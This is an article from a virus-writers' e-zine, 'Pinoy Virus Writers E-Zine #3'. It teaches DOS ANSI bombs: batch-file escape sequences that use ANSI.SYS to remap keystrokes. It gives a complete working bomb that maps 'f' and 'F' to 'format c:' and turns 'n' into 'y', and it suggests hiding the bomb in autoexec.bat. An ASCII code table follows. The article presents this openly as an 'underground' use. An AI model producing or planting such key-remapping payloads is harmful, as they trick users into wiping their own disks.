ฤฤฤฤฤฤฤ[PVW3.010]ฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤฤ
Written for the : Pinoy Virus Writers E-Zine #3

 `v'-
  || |`.                    % % % % %

  ษอออ [ P.V.W. #3 ] อออออออออออออออออออออออออออออออออออออออออออป
  ศอออออออออออออออออออออออออออออออออออออออออออออออออออออออออออออผ

 Ansi bombs are kind of virii related. They dont actually infect other files
 but becoz of it's hidden agenda makes it a candidate for dis ussion in this
 ezine .
 First thing to do is to make sure that the ANSI.SYS driver in your config.sys
 is loaded. If not edit your config.sys and put the line

 DEVICE=C:\WINDOWS\ANSI.SYS

 OR DEVICEHIGH=C:\WINDOWS\ANSI.SYS

 Now remember to specify the correct path of the file ANSI.SYS . After doing so
 restart your system. Now let us start. We will put ansi-bomb codes on batch
 files , autoexec.bat most likely target.

  1. First you must start with

     @ECHO ON

  2. Then on the next line. Write .All ansi-bombs commands must start with this.

     [

  3. Remember that the function of ANSI.SYS is for the user to manipulate
     Screen and Keyboard functions. So we will deal with keyboard intructions.
     Here are examples :

["a";"z";13p              ["f";"format c:";13p

is the same as             is the same as

[97;122;13p               [102;102;111;114;109;97;116;32;99;58;13p
                              ^   ^   ^   ^   ^   ^  ^   ^  ^  ^
                              f   f   o   r   m   a  t      c  :

   This example assigns the command "Format c:\" in the key "f"
Remember to put "@ECHO ON" as the first line in the ansi-bomb.

Full version:

@ECHO ON
[78;89;13p
[110;121;13p
[102;"format c:";13p
[70;"format c:";13p

That little bomb changes "n" to "y"  and "N" to "Y". It also changes "f" to
"format c:" and "F" to "format c:". 

Most Ansi commands are used by newbies for their autoexec.bat making pictures
,text blinking ,and screen background and forweground colouring. We just made
further uses for it , underground uses that is .

                     ASCII TO HEX CONVERSION TABLE


!=33  "=34  #=35  $=36  %=37  &=38  '=39  (=40  )=41  *=42  +=43  -=45

/=47  0=48  1=49  2=50  3=51  4=52  5=53  6=54  7=55  8=56  9=57  :=58

;=59  <=60  ==61  >=62  ?=63  @=64  A=65  B=66  C=67  D=68  E=69  F=70

G=71  H=72  I=73  J=74  K=75  L=76  M=77  N=78  O=79  P=80  Q=81  R=82

S=83  T=84  U=85  V=86  W=87  X=88  Y=89  Z=90  [=91  \=92  ]=93  ^=94

_=95  a=97  b=98  c=99  d=100  e=101  f=102  g=103  h=104  i=105  j=106

k=107  l=108  m=109  n=110  o=111  p=112  q=113  r=114  s=115  t=116

u=117  v=118  w=119  x=120  y=121  z=122  {=123  |=124  }=125  ~=126


-[EOF] Tapos na po!------------------------------------------------------------
